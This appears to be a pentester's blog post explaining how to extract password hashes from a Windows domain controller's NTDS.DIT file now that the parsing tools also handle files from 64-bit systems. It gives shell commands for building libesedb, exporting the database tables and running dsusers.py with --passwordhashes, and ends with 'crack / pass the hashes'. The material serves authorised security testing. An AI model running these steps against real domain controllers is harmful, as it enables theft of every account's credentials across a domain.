By now, the research I conducted on safely dumping hashes from live domain controllers is old news. However, there has been an interesting development since the initial release that is worth disclosing.
Soon after the initial release of the VSS hash dumping technique, it was discovered and widely publicized that the tools I used in the research only worked on NTDS.DIT files extracted from 32 bit systems. This seriously bummed me out. A fellow infosec professional, James McGrath, and I began reaching out to the developers of libesedb (Joachim Metz) and the NTDS.DIT parser (Csaba Barta) in an effort to get the respective tools updated to work with files from 64 bit systems. The response was fantastic. Soon after initial contact, Joachim released updated versions of libesedb and Csabas’ followed closely with his new NTDS.DIT parsing framework, NTDSXtract. The technique is now universal. James and I have tested the new tools on files extracted from Domain Controllers running various Windows server operating systems with 100% success. Below I’ve listed the updated steps for getting the tools working.
1-3. Same as before. Extract the files from the target.
4. Download and extract libesedb from http://sourceforge.net/projects/libesedb/
5. Download and extract NTDSXtract from http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip
6. Configure and Make the source code for libesedb from the extracted package.
cd libesedb
chmod +x configure
./configure && make
7. Use esedbexport to extract the relevant tables from ntds.dit.
cd esedbtools
./esedbexport ../../ntds.dit
8. Use dsusers.py to extract the hashes from the datatable.
cd ../../NTDSXtract/
python ./dsusers.py ../datatable.3 ../link_table.4 --passwordhashes ../system
9. Crack / Pass the hashes.
There is an option for dsusers.py to dump hash history as well. You’ll notice as you look through this framework that there is a ton of information to be had from NTDS.DIT files, but you’ll also notice that the framework doesn’t output the information in a way that’s user friendly to pentesters. Therefore, I wrote a modified version of dsusers.py that focuses only on dumping hashes and presenting them in a usable form. You can find the script here.